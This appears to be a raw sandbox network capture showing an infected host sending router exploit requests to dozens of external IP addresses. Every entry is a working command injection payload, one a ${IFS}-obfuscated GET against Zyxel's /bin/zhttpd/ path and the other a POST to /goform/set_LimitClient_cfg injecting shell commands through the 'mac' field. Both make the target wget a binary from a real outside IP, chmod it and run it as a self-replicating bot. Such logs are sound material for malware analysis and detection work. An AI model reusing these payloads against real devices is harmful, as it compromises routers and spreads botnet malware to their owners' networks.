                                                  Jan 19, 2024 18:24:03.199388027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6331192.168.2.1349668183.82.123.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199407101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6332192.168.2.1355182154.224.74.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199462891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6333192.168.2.1360032203.133.116.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199498892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6334192.168.2.1351922148.69.251.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199531078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6335192.168.2.1340308201.111.23.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199567080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6336192.168.2.135457414.96.206.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199613094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6337192.168.2.1359626134.40.46.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199659109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6338192.168.2.1343640117.41.182.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199712992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6339192.168.2.1345020216.50.86.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199755907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6340192.168.2.1360492112.131.30.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199784994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6341192.168.2.1339648154.124.100.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199817896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6342192.168.2.134653853.182.39.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199851990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6343192.168.2.1359558219.206.45.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199879885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6344192.168.2.133280445.47.244.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199923038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6345192.168.2.1344412174.74.4.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199960947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6346192.168.2.1342808194.168.167.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200026035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6347192.168.2.1346770144.212.102.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200051069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6348192.168.2.1337966189.19.132.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200078964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6349192.168.2.1353778210.199.136.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200130939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6350192.168.2.136016099.144.209.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200165987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6351192.168.2.1344436208.208.238.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200231075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6352192.168.2.133502694.134.91.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200269938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6353192.168.2.134585474.21.67.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200289965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6354192.168.2.1355854124.152.84.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200345039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6355192.168.2.1340732195.117.1.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200368881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6356192.168.2.1359946126.237.127.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200417995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6357192.168.2.133463687.189.212.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200431108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6358192.168.2.133545447.137.35.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200478077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6359192.168.2.133297654.144.192.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200510979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6360192.168.2.1350538134.191.31.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200534105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6361192.168.2.136029082.198.12.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200575113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6362192.168.2.135226654.107.143.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.200622082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6363192.168.2.1337820204.176.238.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.204005957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6364192.168.2.1334896196.191.142.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.204049110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6365192.168.2.1344568191.61.5.208080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.506735086 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:04.206798077 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:05.614801884 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6366192.168.2.135223627.238.114.1038080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.175556898 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:04.468276978 CET103INHTTP/1.1 404 Not Found
                                                  Content-Type: text/plain
                                                  Content-Length: 30
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6367192.168.2.135238439.254.217.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215219021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6368192.168.2.1332970188.95.206.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215302944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6369192.168.2.135307819.207.57.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215348959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6370192.168.2.1353222198.130.167.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215495110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6371192.168.2.1356284202.115.114.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215517998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6372192.168.2.1359642194.224.124.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215578079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6373192.168.2.1355826108.203.59.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215611935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6374192.168.2.1349332181.129.220.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215646029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6375192.168.2.1345814113.26.185.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215672016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6376192.168.2.1336642168.88.91.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215723991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6377192.168.2.134091483.100.169.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215758085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6378192.168.2.1357694101.108.116.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215821028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6379192.168.2.1342836134.183.152.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215847969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6380192.168.2.1340020143.175.53.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215889931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6381192.168.2.134445643.57.82.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215925932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6382192.168.2.135363234.183.81.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215969086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6383192.168.2.1345012171.245.209.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.215984106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6384192.168.2.1346548172.147.194.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216049910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


